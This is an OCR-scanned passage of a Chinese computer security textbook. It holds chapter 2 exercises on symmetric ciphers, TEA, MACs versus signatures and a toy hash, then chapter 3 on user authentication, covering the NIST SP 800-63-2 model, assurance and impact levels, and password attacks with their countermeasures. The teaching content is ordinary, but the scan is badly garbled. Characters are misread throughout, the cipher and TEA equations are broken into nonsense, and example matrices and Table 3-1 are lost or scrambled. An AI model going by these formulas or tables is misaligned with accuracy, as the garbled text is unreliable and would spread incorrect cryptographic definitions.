假定 某 人 建议 用 如 下 方法 来 确认 你 们 两 个 人 是 否 拥有 同一 密 钥 。 你 创建 了 一 个 与 密 钥 长 度 相 等 的 随 
机 比特 串 ， 将 它 和 密 钥 进行 异 或， 并 通过 通道 发 送 结果 。 你 的 伙伴 将 得 到 的 分 组 与 密 钥 (应 该 和 你 
的 密 钥 相同 ) 进行 异 或 并 发 回 它 。 你 进行 核对 并 且 如 果 你 接收 到 的 是 你 的 原始 随机 串 ， 你 就 证 实 了 
你 的 伙伴 拥有 同一 密 钥 ， 而 你 们 两 个 人 都 还 没有 传递 过 密 钥 。 这 个 方案 有 缺陷 吗 ? 
这 个 问题 是 现实 世界 中 一 个 对 称 密码 的 例子 ， 它 来 自 于 以 前 美国 的 特种 部 队 手 册 (公开 的 部 分 )。 这 
个 文件 的 文件 名 为 Special Foreces.pdf， 可 以 在 box.com/CompSec3e 网 站 上 获得 。 
a. 利用 两 个 密 钥 (内存 字 ) cryptographic 和 network security， 加 密 下 面 的 文字 : 
Be at the third pillar from the left outside the lyceum theatre tonight at 
seven. If you are distrustful bring two friends. 
对 于 怎样 处 理 内存 字 中 宛 余 字 母 和 过 多 字符 以 及 怎样 处 理 空 白 和 标点 符号 进行 合理 的 假设 。 说 明 
你 的 假设 是 什么 。 
注 : 本 条 消息 来 源 于 福尔摩斯 小 说 ;The sign of Four. 
b. 对 密 文 进行 解密 ， 并 给 出 解密 结果 。 
c. 讨论 在 什么 时 候 适 合 采用 这 项 技术 ， 以 及 它 的 优点 是 什么 。 
考虑 一 个 非常 简单 的 对 称 分 组 加 密 算法 ， 利 用 一 个 128 位 的 密 钥 对 64 位 明文 分 组 进行 加 密 。 加 密 
过 程 定义 如 下 : 
C=(P@K)HK 
这 里 C= 密 文 ; K= BREA; Ko 二 K 的 最 左边 的 64 位 ; KEK HRA 6411, O= MURR 
作 ; 田 是 模 24 加 法 运算 。 
a. 写 出 解密 方程 ， 也 就 是 将 PRERA C, K, AK 的 函数 。 
b. 假设 攻击 者 已 经 获得 了 两 套 明文 和 对 应 的 密 文 并 希望 确定 密 钥 天 ， 有 两 个 方程 
C=(P@K)HEK; C =P' OK) HK: 
首先 推导 出 只 含 一 个 未 知 量 (如 Ky) 的 方程 。 是 否 可 以 进一步 求 出 Ko ? 
或 许 最 简单 的 “标准 ”对 称 分 组 加 密 算法 是 Tiny 加 密 算法 (TEA). TEA 使 用 一 个 128 位 的 密 钥 对 
64 位 的 明文 分 组 进行 运算 。 明 文 被 分 成 两 个 32 位 的 分 组 (Zo，Ro )， 密 钥 被 分 成 4 个 32 位 的 分 组 
(Ko，K1，K,，Ks )。 加 密 涉及 两 轮 的 重复 应 用 ， 定 义 第 i 轮 和 第 i 十 1 轮 运算 如 下 : 
Li=Ri-! 
Ri=Li-1 H F(Ri-1, Ko, Ki, ĉi) 
Lii SR 
Rii =L B F(R; Ka, Ks, ĝi+1) 
这 里 下 定义 如 下 : 
FM, Ki, Ki, 5:)=((M<A) Kj) © (M>5) Ki) © (M+ ô) 
这 里 x 对 逻辑 左 移 位 表示 为 x<y; x BRA y RRA >y; 5; 是 一 个 预定 义 的 常量 序列 。 
a. 评价 使 用 常量 序列 的 重要 性 和 优点 。 
b. 利用 框图 或 流程 图 描述 TEA 的 运算 过 程 。 
c. 假设 只 进行 了 两 轮 ， 密 文 由 64 HE (Lo, R) 组 成 。 在 这 种 情况 下 ， 写 出 解密 算法 的 方程 。 
d. 采 用 类 似 (b) 部 分 所 用 的 方法 再 次 完成 (c) 部 分 。 
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2.5 这 里 我 们 比较 一 下 由 数字 签名 (DS) 和 消息 认证 码 (MAC) 提供 的 安全 服务 。 假 定 Oscar 可 以 看 到 
Alice 发 给 Bob 的 所 有 信息 ， 也 可 以 看 到 Bob 发 给 Alice 的 所 有 消息 ， 对 于 数字 签名 ，Oscar 除了 
公 钥 之 外 不 知道 其 他 任何 密 钥 。 解 释 : (i) DS 和 (ii) MAC 是 否 能 防御 下 面 各 种 攻击 以 及 如 何 防御 。 
auth(x) 的 值 分 别 用 DS 和 MAC 算法 计算 。 
a. (消息 完整 性 ) Alice 将 消息 x= “HF 1000 美元 转账 给 Mark” 以 明文 的 形式 发 送 给 Bob， 并 连同 
auth(x) 一 起 发 给 Bob. Oscar 中 途 截获 了 该 消息 并 用 “ Oscar” 替换 “Mark”。 那 么 Bob 可 以 检 
测 出 来 吗 ? 
b. ( 重 放 ) Alice 将 消息 x 二 “将 1000 美元 转账 给 Oscar” 以 明文 的 形式 发 送 给 Bob， 并 连同 auth(x) 
一 起 发 给 Bob。Oscar 观察 到 了 该 消息 和 签名 ， 并 将 其 发 送 给 Bob 100 次 。 那 么 Bob 可 以 检测 出 
来 吗 ? 
c.( 欺 骗 第 三 方 的 发 送 方 认证 ) Oscar 声称 他 将 消息 x 连同 有 效 的 auth(x) 发 送 给 了 Bobs M Aclice 却 
说 是 她 发 的 。 那 么 Bob 可 以 区 分 出 是 谁 发 的 吗 ? 
d. ( Bob 欺骗 认证 ) Bob 声称 他 从 Alice 那里 收 到 了 x 消息 和 有 效 的 签名 auth(x) (如 “将 1000 美元 
从 Alice 那里 转账 到 Bob”)， 但 是 Alice 说 她 没 发 过 这 样 的 消息 。 那 么 Alice 能 解释 清楚 这 个 问 
题 吗 ? 
2.6 假设 H(m) 是 一 个 抗 磁 撞 散 列 函 数 ， 该 散 列 沙 数 将 任意 长 度 的 消息 映射 成 a 位 的 散 列 值 。 那 么 对 于 
所 有 的 消息 x、x'， 且 x 关 x'"，H(x) 关 H(x') 是 正确 的 吗 ? 说 出 你 的 理由 。 
2.7 ”本题 介绍 一 种 在 思想 上 类 似 于 SHA 的 散 列 函 数 ， 它 对 字母 进行 运算 而 不 是 二 进 制 数据 ， 其 被 称 为 
玩具 四 字母 散 列 (toy tetragraph hash, tth) 9。 给 定 一 个 由 字母 序列 组 成 的 消息 ，tth 产生 由 四 个 字 
母 组 成 的 散 列 值 。 首 先 ，tth 把 消息 分 成 16 个 字母 长 的 分 组 ， 并 且 忽 略 空格 、 标 点 符号 和 大 写 。 如 
果 消 息 长 度 不 能 被 16 整除 ， 则 用 空 值 (null) 填充 。 维 护 由 四 个 数字 组 成 的 累加 值 (running total), 
其 初 值 为 (0, 0, 0, 0 ); 将 其 输入 一 个 函数 ( 称 为 压缩 函数 )， 用 来 处 理 第 一 个 分 组 。 压 缩 函 数 由 两 轮 
构成 。 第 一 轮 : 取 下 一 个 分 组 ， 按 行 排列 成 4X4 的 方 阵 形式 ， 然 后 将 它 转换 成 数字 (A=0, B=], 
等 等 )。 例 如 ， 对 于 分 组 ABCDEFGHIJKLMNOP, 我 们 有 : 





然后 将 每 一 列 模 26 相 加 ， 再 把 所 得 的 结果 模 26 加 至 累加 值 。 对 于 本 例 ， 累 加 值 是 ( 24, 2, 6, 
10 )。 第 二 轮 : 使 用 第 一 轮 运 算得 到 的 矩阵 ， 第 一 行 循环 左 移 1 个 位 置 ， 第 二 行 循环 左 移 2 个 位 置 ， 
第 三 行 循环 左 移 3 个 位 置 ， 第 四 行 的 顺序 完全 颠倒 。 在 我 们 的 例子 中 为 





这 时 我 们 对 每 一 列 模 26 相 加 ， 再 将 结果 加 至 累加 值 ， 新 的 累加 值 是 ( 5, 7, 9, 11 ) 。 现 在 的 累加 
值 作为 下 一 个 分 组 的 压缩 函数 的 第 一 轮 输 入 。 最 后 一 个 分 组 处 理 完 毕 后 ， 再 把 最 终 的 累加 值 转换 为 
字母 。 例 如 ， 如 果 消 息 是 ZBCDEFGHIJKLMNOP， 那 么 散 列 值 为 FHJL。 


日 感谢 《The Cryptogram 》 杂 志 的 职员 William K. Mason 提供 了 本 例 。 
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a. 画图 说 明 完整 的 tth 逻辑 和 压缩 函数 逻辑 。 
b. 对 于 48 个 字母 的 消息 “1 leave twenty million dollars to my friendly cousin Bill”, HH% HH È ME 
列 值 。 

c. 说 明 tth 的 弱点 ， 找 出 产生 与 刚才 相同 的 散 列 值 的 48 个 字母 组 成 的 分 组 。 提 示 : 利用 大 量 的 A。 
2.8 在 任何 诸如 RSA 的 公 钥 体制 出 现 之 前 ， 就 已 经 有 了 关于 公 钥 体制 存在 性 的 证 明 ， 其 目的 是 为 了 说 

明 公 和 钥 密 码 在 理论 上 是 可 行 的 。 H BAKA) =z, fax, 2) =22, fa(x3, y3)=2;, 其 中 的 值 都 

是 整数 ， 且 1 科 z yi, SNo BRA 可 以 用 长 为 NN 的 矢量 M1 表示， 其 中 M1 的 第 个 分 量 即 是 

Ak) ;类似 地 ,和 所 可 分 别 用 NXN 和 矩阵 M2 和 M3 表示 。 这 样 表示 的 目的 是 希望 通过 查 N 值 很 

大 的 表 来 实现 加 密 /解密 过 程 。 这 样 的 表 太 大 ， 实 践 中 不 可 行 ， 但 理论 上 是 可 以 构造 的 。 该 方案 的 

工作 过 程 如 下 : 首先 ， 构 造 M1 为 1 到 和 之 间 的 所 有 整数 的 一 个 随机 排列 ， 即 每 个 整数 在 M1 中 

恰好 出 现 一 次 。 构 造 M2 ， 使 其 每 行 都 是 前 N 个 整数 的 一 个 随机 排列 ; 最 后 按 下 述 条 件 生成 M3 : 

ALAW, p), =p, 对 所 有 Kk, pH 1<k, p<N 

也 就 是 说 : 

1. M1 的 输入 为 上 ， 输 出 为 x。 

2. M2 的 输入 为 x 和 p， 输 出 为 z。 

3. M3 的 输入 为 z 和 k， 输 出 为 p。 

构造 好 三 张 表 之 后 ， 将 其 对 外 公开 。 

a. 显然 ， 可 以 构造 出 满足 以 上 条 件 的 M3。 作 为 一 个 例子 ,请 对 于 下 面 的 简单 情况 将 M3 填写 完整 : 





约定 : MI 的 第 i 个 分 量 对 应 =i ; M2 的 第 i 行 对 应 x 二 i:，M2 的 第 j 列 对 应 p=j ; M3 的 第 i 行 
对 应 z=i, M3 的 第 j 列 对 应 X=j。 可 以 以 另 一 种 方式 来 看 这 个 问题 , M1 的 第 i 行 对 应 M3 的 第 i 列 ， 
第 i 行 的 分 量 值 选 出 M2 的 一 行 。M3 的 选 定 列 的 分 量 来 自 M2 的 选 定 行 的 分 量 。M2 的 选 定 行 中 
的 第 一 个 分 量 指出 值 “1” 在 M3 的 选 定 列 中 的 位 置 。M2 的 选 定 行 中 的 第 二 个 分 量 指出 值 “2” 
在 M3 的 选 定 列 中 的 位 置 ， 依 此 类 推 。 

b. 说 明 如 何 使 用 上 述 各 表 在 两 个 用 户 间 实 现 加 密 和 解密 。 

c. 证 明 这 是 一 种 安全 的 方案 。 

2.9 构造 一 张 与 图 2-8 类 似 的 图 ， 其 中 包括 对 数字 信封 中 的 消息 进行 认证 的 数字 签名 。 
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学 习 目 标 

学 习 完 本 章 之 后 ， 你 应 该 能 够 : 

© 讨论 用 户 身份 认证 的 四 种 一 般 方法 ; 
解释 基于 散 列 口令 的 用 户 认 证 的 机 制 ; 


理解 Blom 过 滤器 在 口令 管理 中 的 作用 ; 

概述 基于 令 牌 的 用 户 认证 ; 

讨论 远程 用 户 认证 所 涉及 的 问题 与 解决 方法 ; 

概述 用 户 认证 中 的 密 钥 安全 问题 。 

在 大 多 数 计 算 机 安全 环境 中 ， 用 户 认 证 在 安全 防范 体系 中 是 最 基本 的 组 成 部 分 ， 也 是 防范 


人 侵 的 主要 防线 。 用 户 认 证 还 是 大 多 数 访问 控制 策略 以 及 追究 用 户 责任 的 基础 。RFC4949 定义 
了 用 户 认证 的 概念 如 下 : 


验证 系统 实体 自己 声称 的 或 者 第 三 方 声称 的 身份 的 过 程 。 认 证 过 程 包括 两 个 步 又 : 
© 识别 步骤 : 向 安全 系统 提供 一 个 身份 标识 。( 由 于 认证 的 身份 是 其 他 安全 服务 (如 访问 








控制 服务 ) 的 基础 ， 因 此 应 该 慎重 分 配 标识 符 。) 
o UER: 提供 或 者 产生 认证 信息 ， 以 证 实 实体 与 标识 符 之 间 的 绑 定 关系 。 





例如 ,用户 Alice Toklas 拥有 用 户 ID ABTOKLAS。 该 信息 应 该 存储 在 Alice 想 要 使 用 的 任 
何 服务 器 或 计算 机 系统 中 ， 并 对 系统 管理 员 及 其 他 用 户 是 已 知 的 。 认 证 信息 中 ， 一 般 与 用 户 
ID 联系 在 一 起 的 数据 项 是 口令 ,口令 是 机 密 信 息 ( 仅 对 Alice 和 系统 可 知 ) 8。 如 果 没 有 人 能 
够 得 到 或 猜 到 Alice 的 口令 ， 那 么 系统 管理 员 就 可 以 利用 Alice 的 用 户 ID 与 口令 的 组 合 ， 建 立 
Alice 的 访问 权限 并 审计 她 的 活动 。 由 于 Alice 的 用 户 ID 不 保密 ， 系 统 中 的 所 有 用 户 都 可 以 向 
Alice 发 送 电子 邮件 ， 但 是 Alice 的 口令 却 是 保密 的 ， 这 就 保证 别人 不 能 伪装 成 Alice。 
从 本 质 上 讲 ， 身 份 识别 就 是 用 户 向 系统 声称 其 身份 的 方法 ; 用 户 认证 则 是 建立 该 声称 的 有 
效 性 的 方法 。 值 得 注意 的 是 ， 用 户 认证 不 同 于 消息 认证 。 第 2 章 已 定义 ， 消 息 认证 是 通信 各 方 |? 
验证 所 接收 的 消息 没有 被 更 改 且 消息 源 真 实 的 过 程 。 本 章 仅 关注 用 户 认 证 。 73 
本 章 首先 对 不 同 的 用 户 认 证 方法 进行 综述 ， 然 后 详细 地 分 析 每 种 认证 方法 。 


3.1 电子 用 户 认 证 方法 


NIST SP 800-63-2 (电子 认证 指南 ，2013 年 8 月 ) 给 出 了 电子 用 户 认证 的 定义 : 信息 系统 
对 用 户 电子 地 提交 的 身份 建立 信任 的 过 程 。 系 统 可 以 通过 认证 个 体 的 身份 而 决定 该 个 体 是 否 已 
被 授权 从 而 可 使 用 系统 所 提供 的 某 种 功能 ， 例 如 处 理 数据 库 事务 或 访问 系统 资源 。 大 多 数 情况 
下 ， 认 证 、 事 务 或 其 他 授权 功能 通常 在 类 似 Internet 的 开放 网 络 中 运行 。 同 样 地 ， 认 证 和 后 续 
的 授权 亦 可 在 本 地 运行 ， 例 如 在 局 域 网 中 。 


日 通常 ,口令 以 散 列 的 形式 存储 在 服务 器 端 ， 而 且 其 散 列 码 很 可 能 不 是 保密 的 。 本 章 随后 会 讨论 这 部 分 内 容 。 
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3.1.1 电子 用 户 认证 模型 


SP 800-63-2 定义 了 一 个 涉及 若干 实体 和 流程 的 用 户 认 证 模型 。 我 们 参照 图 3-1 来 讨论 这 
个 模型 。 





图 3-1 NIST SP 800-63-2 电子 认证 结构 模型 


认证 模型 首先 要 求 使 用 者 必须 在 该 系统 中 注册 。 下 面 是 一 个 典型 的 注册 流程 。 申 请 人 向 注 
册 中 心 ( Registration Authority, RA) 提交 申请 ， 成 为 一 个 证 书 服务 提供 商 (Credential Service 
Provider, CSP) 的 用 户 ( subscriber)。 在 这 个 模型 中 ，RA 是 一 个 可 信和 实体 ， 它 建立 申请 人 身 
份 并 为 之 向 CSP 提供 担保 。 之 后 ，CSP 与 用 户 进行 认证 信息 交换 ， 依 据 整个 认证 系统 的 具体 
细节 ，CSP 可 将 某 种 电子 证 书 发 布 给 用 户 。 该 证 书 是 一 种 数据 结构 ， 它 将 身份 和 某 些 附加 属 

性 绑 定 在 用 户 令 牌 上 进行 授权 。 而 且 ， 在 认证 事务 中 ， 证 书 的 提交 时 间 是 可 验证 的 。 令 牌 被 用 
于 唯一 地 识别 用 户 ， 它 可 以 是 一 个 加 密 密 钥 或 者 一 个 被 加 密 过 的 口令 。 令 牌 可 以 由 CSP 发 布 ， 
可 以 由 用 户 直接 生成 ， 也 可 以 由 第 三 方 提供 。 令 牌 和 证 书 将 会 在 后 续 的 认证 事件 中 使 用 。 

一 且 一 个 使 用 者 注册 成 为 一 个 用 户 ， 那 么 在 用 户 与 某 些 系统 之 间 的 实际 认证 过 程 便 得 以 
进行 ， 系 统 功 能 包括 认证 和 后 续 的 授权 。 被 认证 的 团体 称 为 请 求 者 (claimant)， 而 进行 身份 验 
证 的 团体 被 称 为 验证 者 ( verifier)。 如 果 请 求 者 通过 认证 协议 向 验证 者 证 明了 它 对 令 牌 的 掌控 ， 
那么 验证 者 即 可 验证 该 请 求 者 是 证 书 中 相应 的 用 户 。 验 证 者 将 一 个 关于 用 户 身份 的 声明 传递 给 
KPFT (Relying Party，RP)。 声 明 包 括 用 户 的 身份 信息 ， 例 如 用 户 名 、 注 册 时 分 配 的 ID, 或 
用 户 的 其 他 验证 属性 。 利 用 验证 者 提供 的 认证 信息 ，RP 可 以 决定 各 种 访问 控制 和 授权 行为 。 

当然 ， 一 个 实际 应 用 的 认证 系统 比 这 个 简单 模型 要 复杂 得 多 ， 但 是 这 个 模型 描述 了 一 个 安 
全 认证 系统 要 求 的 各 个 关键 角色 和 功能 。 


3.1.2 ”认证 方法 


用 于 用 户 身份 认证 的 方法 一 般 有 四 种 ， 它 们 可 以 单独 使 用 也 可 以 组 合 起 来 使 用 ; 

e 个 人 所 知道 的 信息 : 例子 包括 口令 、 个 人 标识 码 (Personal Identification Number, PIN) 
以 及 对 预先 设置 的 问题 的 答案 。 

e 个 人 所 持 有 的 物品 : 例子 包括 电子 钥匙 卡 、 智 能 卡 和 物理 钥匙 。 这 种 认证 器 件 通常 称 
为 令 牌 。 

© 个 人 的 生理 特征 (静态 生物 特征 ): 例子 包括 指纹 识别 、 虹 膜 识别 及 人 脸 识 别 等 。 

e 个 人 的 行为 特征 (动态 生物 特征 ) : 例子 包括 通过 语音 模式 和 笔迹 特征 进行 的 识别 ， 以 
及 根据 打字 节奏 进行 的 识别 。 
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尽管 所 有 的 这 些 方法 ， 在 合适 的 情况 下 都 可 以 给 用 户 提供 安全 的 认证 服务 。 然 而 ， 每 一 种 
认证 方法 都 存在 一 些 问题 。 敌 手 可 以 猜测 或 者 盗窃 用 户 的 口令 。 类 似 地 ， 敌 手 也 能 伪造 或 者 盗 
取 令 牌 。 用 户 也 可 能 会 丢失 令 牌 或 者 忘记 口令 。 此 外 ， 系 统 对 口令 和 令 牌 信息 的 管理 和 对 其 保 
密 的 代价 也 不 能 被 忽视 。 至 于 使 用 生物 特征 进行 认证 ， 这 种 方法 也 存在 很 多 的 问题 ， 包 括 误 报 
和 漏 报 处 理 、 用 户 的 认可 程度 、 使 用 成 本 和 易 用 性 等 。 


3.13 ”用 户 认 证 的 风险 评估 


全 面 的 安全 风险 评估 将 在 本 书 的 第 14 章 讨 论 。 本 节 中 ， 我 们 介绍 一 个 与 用 户 认证 相关 的 
特殊 例子 。 这 里 有 三 个 独立 的 概念 : 置信 等 级 、 洪 在 影响 和 风险 范围 ， 而 我 们 想 要 将 它们 联系 
起 来 。 

置信 等 级 ”置信 等 级 描述 了 组 织 对 以 下 事件 的 信任 程度 : 用 户 已 经 提交 了 一 个 关于 其 身份 
的 证 书 。 更 特殊 的 情况 下 ， 置 信 可 以 被 定义 为 : (1 ) 对 创建 个 体 身份 的 审查 过 程 的 信任 程度 ， 
其 中 该 个 体 是 证 书 的 接收 者 ; (2) 对 证 书 使 用 者 即 证 书 接收 者 的 信任 程度 。SP 800-63-2 确认 
了 四 个 置信 等 级 ， 

© 等 级 1 : 几乎 或 完全 不 信任 待 证 实 身份 的 合法 性 。 举 例 来 说 ， 该 等 级 适用 于 客户 在 一 

个 公司 网 站 的 讨论 版 里 注册 并 参与 讨论 的 情形 。 在 该 置信 等 级 下 ， 典 型 的 认证 技术 是 
事务 中 用 户 提供 的 ID 和 口令 。 

e 等 级 2 : 部 分 信任 待 证 实 身份 的 合法 性 。 等 级 2 证 书 适 用 于 公开 的 大 范围 商务 活动 ， 


其 中 参与 活动 的 组 织 需 要 一 个 初始 的 身份 声明 (在 任何 行为 之 前 的 独立 验证 细节 )。 在 . 


该 置信 等 级 下 ， 需 要 使 用 到 某 种 安全 认证 协议 ， 以 及 某 种 之 前 总 结 过 或 接 下 来 将 要 讨 
论 的 认证 方法 。 
等 级 3: 高 度 信任 待 证 实 身份 的 合法 性 。 该 等 级 适用 于 授予 客户 端 或 雇员 访问 高 级 (但 
不 是 最 高 级 ) 机 密 服 务 器 的 权限 。 例 如 ， 专 利 律 师 向 美国 专利 商标 局 提供 电子 版 专利 
证 书信 息 。 不 当 的 泄密 会 导致 竞争 对 手 获 利 。 在 该 置信 等 级 下 ， 认 证 技术 需要 涉及 多 
种 因素 ， 即 至 少 需要 使 用 到 两 种 相互 独立 的 认证 技术 。 
等 级 4 : 极其 高 度 地 信任 待 证 实 身份 的 合法 性 。 该 等 级 适用 于 授予 客户 端 或 雇员 访问 
极 高 级 机 密 服 务 器 的 权限 ， 这 种 服务 器 一 旦 被 不 当 人 侵 即 会 遭受 极 大 的 损失 。 例 如 ， 
执法 官员 试图 访问 一 个 包含 犯罪 记录 的 法 制 数 据 库 。 未 经 允许 的 访问 可 能 引发 隐私 
问题 和 /或 妨碍 调查 。 一 般 情 况 下 ， 在 等 级 4 下 需要 使 用 到 如 个 人 登记 一 样 的 多 因素 
认证 。 
潜在 影响 ”潜在 影响 是 一 个 与 置信 等 级 紧密 相关 的 概念 。FIPS 199 (Standards for Security 
Categorization of Federal Information and Information Systems, 2004 ) 定义 了 在 安全 性 遭 到 破坏 
(在 上 下 文中 一 般 指 用 户 认证 失败 ) 的 情况 下 ， 个 体 或 者 组 织 受到 潜在 影响 的 三 个 等 级 : 
o 低 : 认证 错误 对 组 织 运作 、 组 织 资产 及 个 人 造成 的 预期 不 良 影响 有 限 。 特 殊 情 况 下 ， 
可 以 认为 此 类 错误 是 : (1 ) 致使 处 理 任务 的 能 力 降低 ， 且 在 此 期 间 组 织 能 行使 其 基本 
功能 ， 但 是 效率 降低 ; (2) 致使 组 织 设施 受到 轻微 的 损毁 ; (3) 致使 组 织 和 个 体 受 到 
较 小 的 经 济 损失 ; (4) 致使 个 体 受到 轻微 的 损害 。 
of: 认证 错误 造成 的 预期 不 良 影响 比较 严重 。 更 特殊 的 情况 下 ， 此 类 错误 可 能 是 : 
(1) 致使 处 理 任务 的 能 力 显著 降低 ， 且 在 此 期 间 组 织 能 行使 其 基本 功能 ， 但 是 效率 显 
著 降 低 ;( 2 ) 致使 组 织 设施 受到 显著 的 损毁 ; (3) 致使 组 织 和 个 体 受 到 显著 的 经 济 损 
失 ; (4) 致使 个 体 受到 显著 的 损害 ， 但 不 会 致命 。 
e 高 : 认证 错误 造成 的 预期 不 良 影响 非常 严重 ， 甚 至 是 灾难 性 的 。 此 类 错误 可 能 是 : 
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(1 ) 致使 处 理 任务 的 能 力 严重 降低 或 完全 丧失 ， 且 在 此 期 间 组 织 无 法 行使 其 基本 功能 ; 
(2) 致使 组 织 设施 受到 大 规模 损毁 ; (3 ) 致使 组 织 和 个 体 受 到 大 规模 经 济 损失 ; 
(4) 致使 个 体 受 到 非常 严重 或 灾难 性 的 损害 ， 甚 至 致命 。 
风险 范围 ”在 潜在 影响 到 与 之 相对 应 的 置信 等 级 间 存 在 的 一 种 映射 关系 ， 且 该 映射 取决 于 
应 用 背景 。 对 于 组 织 可 能 遭受 的 种 种 风险 ， 表 3-1 给 出 了 一 个 可 能 的 映射 。 该 表 提 出 了 一 种 评 
估 风 险 的 手段 。 对 于 一 个 给 定 的 信息 系统 或 服务 器 设施 ， 如 果 有 认证 错误 发 生 ， 其 所 有 者 需要 
评定 其 所 受 影响 的 等 级 ， 且 应 参考 相关 的 影响 类 别 或 风险 范围 。 


表 3-1 各 置信 等 级 下 的 最 大 潜在 影响 


认证 错误 造成 的 潜在 影响 的 类 型 i 
ae ee ee ee A 
对 地 位 或 声誉 造成 困扰 、 危 机 或 损毁 osa | 中 | 中 | a 
对 组 织 方针 或 利益 有 损害 Ee | æ | 中 | & 
ene C | a [eee 


例如 ， 某 处 出 现 一 个 认证 错误 而 导致 数据 库 被 非法 访问 ， 考 虑 这 种 情况 造成 的 潜在 经 济 损 
Kk 鉴于 数据 库 的 固有 特性 ， 受 到 的 影响 可 能 为 : 

o 低 : 在 最 坏 情况 下 ,任何 团队 遭受 的 不 可 恢复 的 经 济 损失 以 及 组 织 承担 的 责任 都 是 微 

07] 不 足 道 或 是 无 关 紧 要 的 。 
。 中 : 在 最 坏 情况 下 ， 任 何 团队 遭受 的 不 可 恢复 的 经 济 损失 或 者 组 织 承担 的 责任 比较 严重 。 
。 高 : 在 最 坏 情 况 下 ， 任 何 团队 遭受 的 不 可 恢复 的 经 济 损失 或 者 组 织 承担 的 责任 极其 严 
重 甚至 是 灾难 性 的 。 

表 3-1 表明 ， 如 果 潜 在 影响 等 级 为 低 ， 那 么 置信 等 级 1 即 可 满足 要 求 。 如 果 洪 在 影响 等 级 
为 中 ， 那 么 置信 等 级 应 该 达到 2 或 者 3。 而 且 ， 如 果 潜在 影响 等 级 为 高 ， 那 么 置信 等 级 应 该 达 
到 4。 类 似 的 分 析 可 以 运用 于 表 中 其 他 类 型 的 影响 。 在 分 析 之 后 ,分 析 人 土 得 以 选取 一 个 置信 
等 级 ， 该 置信 等 级 能 够 达到 或 高 于 表 中 各 影响 类 型 的 置信 和 需求。 这样 ， 对 于 一 个 系统 而 言 ， 如 
果 任 何 影 响 类 型 均 具 有 高 等 级 的 潜在 影响 ,或 者 在 个 人 安全 方面 具有 中 高 等 级 的 潜在 影响 ， 那 
么 应 该 使 用 置信 等 级 4。 


3.2 ”基于 口令 的 认证 


对 于 抵御 入 侵 者 ， 口 令 系统 是 应 用 最 广泛 的 防范 手段 。 所 有 的 多 用 户 操作 系统 、 网 络 服务 
器 、 基 于 Web 服务 的 电子 商务 网 站 以 及 其 他 类 似 的 系统 ， 不 仅 要 求 用 户 提供 用 户 名 或 标识 符 
(ID)， 还 要 求 提 供 口令 。 系 统 将 该 口令 与 以 前 保存 的 该 用 户 ID 的 口令 进行 比较 。 口 令 的 作用 
就 是 对 登录 到 系统 上 的 用 户 ID 进行 认证 。 反 过 来 ,用 户 ID 通过 以 下 几 种 方法 来 保证 安全 性 : 

。 HP ID 决定 了 用 户 是 否 被 授权 访问 系统 。 在 某 些 系统 中 ， 不 允许 匿名 登录 ， 只 有 在 系 

统 中 已 具有 ID 的 用 户 才能 对 系统 进行 访问 。 
。 HP ID 决定 了 该 用 户 所 拥有 的 访问 权限 。 一 些 用 户 可 能 会 拥有 “超级 用 户 ” 的 权限 ， 
可 以 读 取 被 操作 系统 特别 保护 的 文件 ， 执 行 被 操作 系统 特别 保护 的 功能 。 某 些 系统 中 
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定义 了 gues 账户 或 者 匿名 账户 ， 这 些 账 户 的 用 户 比 其 他 级 别 的 用 户 拥有 更 少 的 权限 。 
用 户 ID 还 可 应 用 在 自主 访问 控制 机 制 中 。 例 如 ， 一 个 用 户 如 果 可 以 列 出 其 他 用 户 的 
ID， 那 么 他 就 可 以 授权 这 些 用 户 读 取 他 所 拥有 的 文件 。 


口令 的 脆弱 性 


在 本 小 节 中 ， 我 们 概述 对 基于 口令 的 认证 的 攻击 的 主要 形式 ， 并 简要 地 介绍 相应 的 对 策 。 

通常 ， 一 个 基于 口令 认证 的 系统 中 ， 都 会 维护 着 一 个 以 用 户 ID 作为 索引 的 口令 文件 。 在 
随后 的 内 容 中 ， 我 们 将 会 介绍 一 种 并 不 对 口令 进行 存储 而 是 对 口令 的 单 向 散 列 函 数值 进行 存储 
的 典型 应 用 技术 。 

下 面 是 一 些 口令 攻击 策略 以 及 针对 这 些 攻 击 的 对 策 : 


离线 字典 攻击 (offline dictionary attack): 通常 ， 保 护 系统 中 的 口令 文件 要 使 用 强 访问 控制 
策略 。 但 是 经 验 表 明 ， 有 坚定 信心 的 黑客 总 是 可 以 绕 过 访问 控制 机 制 获得 口令 文件 的 访 
问 权 。 攻 击 者 获取 到 系统 的 口令 文件 并 将 其 中 的 口令 散 列 值 与 通常 所 用 口令 的 散 列 值 进 
行 比 较 。 如 果 找 到 了 相 匹 配 的 结果 ， 那 么 攻击 者 就 可 以 通过 用 户 ID 和 口令 的 组 合 获得 
访问 权 。 对 付 此 类 攻击 有 如 下 几 种 措施 : 防止 非 授 权 访 问 口 令 文件 ; 使 用 入 侵 检测 技术 
对 危及 安全 的 行为 进行 识别 ; 尽快 对 口令 文件 中 的 不 安全 口令 进行 重新 设置 等 。 

特定 账户 攻击 (specific account attack): 攻击 者 把 目标 锁定 为 特定 用 户 ， 并 不 断 地 猜测 
口令 ， 直 至 发 现 正确 的 口令 。 对 抗 这 种 攻击 的 标准 方法 是 使 用 账户 锁定 机 制 ， 当 登录 
失败 的 次 数 超过 一 定数 量 时 就 会 将 用 户 锁定 。 典 型 的 实践 方法 就 是 设置 不 超过 五 次 的 
登录 尝试 次 数 。 

常用 口令 攻击 popular password attack): 上 述 攻 击 的 一 个 变 体 就 是 用 一 个 常用 口令 对 
大 量 的 用 户 ID 进行 尝试 。 通 常用 户 会 倾向 于 选择 一 个 容易 记忆 的 口令 ， 这 就 使 得 口令 
很 容易 被 猜 出 。 对 抗 这 种 攻击 的 方法 包括 禁止 用 户 选择 常用 的 口令 ， 对 认证 请 求 者 的 
IP 地 址 和 用 户 提交 模式 的 cookie 进行 扫描 。 

单 用 户口 令 猜 测 (password guessing against single user) : 攻击 者 试图 获得 账户 拥有 者 信 
息 和 系统 口令 保护 策略 ， 并 使 用 这 些 信息 来 猜测 用 户口 令 。 对 抗 这 种 口令 猜测 的 方法 ， 
包括 训练 并 加 强 口令 保护 策略 以 使 口令 难于 猜测 。 这 些 策略 涉及 保密 、 口 令 的 最 小 长 
度 、 字 符 集 、 禁 止 使 用 常用 用 户 ID、 更 换 口 令 的 时 间 长 度 等 内 容 。 

工作 站 支持 (workstation hijacking): 攻击 者 确认 工作 站 管理 员 已 经 登录 ， 在 管理 员 不 注意 的 
情况 下 进行 人 侵 ， 并 占领 工作 站 。 对 抗 此 类 攻击 的 标准 方法 是 ， 在 工作 站 处 于 非 活动 状 
